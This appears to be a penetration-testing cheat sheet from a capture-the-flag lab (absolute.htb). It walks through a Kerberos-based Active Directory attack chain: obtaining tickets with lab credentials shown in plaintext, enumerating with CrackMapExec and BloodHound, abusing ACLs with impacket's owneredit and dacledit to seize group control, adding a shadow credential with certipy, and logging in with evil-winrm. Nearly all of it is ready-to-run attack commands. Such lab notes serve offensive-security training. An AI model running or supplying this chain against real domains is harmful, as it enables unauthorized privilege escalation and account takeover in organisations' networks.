Kerberos based Enum and Attack Samples
ACL Abuse and Shadow Credential
Preparation
# Get TGT for a user
impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip $RHOST
# Inject it into memory
export KRB5CCNAME=./d.klay.ccache
Enumeration
LDAP
crackmapexec ldap dc.absolute.htb --use-kcache --users

SMB
crackmapexec smb dc.absolute.htb --use-kcache --shares

Bloodhound
bloodhound.py -k -u m.lovegod -p AbsoluteLDAP2022! --auth-method kerberos -d absolute.htb -dc dc.absolute.htb -ns 10.129.228.64 --dns-tcp --zip -c All
Exploitation - ACL Abuse and Shadow Credential
Get a Bloodhound result below. The m.lovegod owns the Network Audit group, which has GenericWrite
on the winrm_user user.
To get access to the machine, I’ll first I’ll need to give m.lovegod write access on the Network Audit group. Then I can add m.lovegod to the group. Finally, I can use those permissions to create a shadow credential for the winrm_user account to access to the machine via evil_winrm.

Update the ownership of the user to add a 'write permission'.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
# Action: give write permission
python3 /opt/python/impacket/impacket/examples/owneredit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -new-owner m.lovegod -target 'Network Audit' -action write
Add the full control of Group to the user.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
# Action: give write permission
# Right: FullControl
python3 /opt/python/impacket_porgs/impacket/examples/dacledit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
Add the user to the group.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
Kali> kinit m.lovegod
Kali> net rpc group addmem "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb m.lovegod
# or
Kali> net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Create a Shadow Credential.
# Let's find ADCS environment. You will see some ADCS configurations.
KRB5CCNAME=./d.klay.ccache certipy find -username m.lovegod@absolute.htb -k -target dc.absolute.htb
# Let's add the shadow credential to the winrm_user user
KRB5CCNAME=./d.klay.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Let's connect to the machine
KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb

Last updated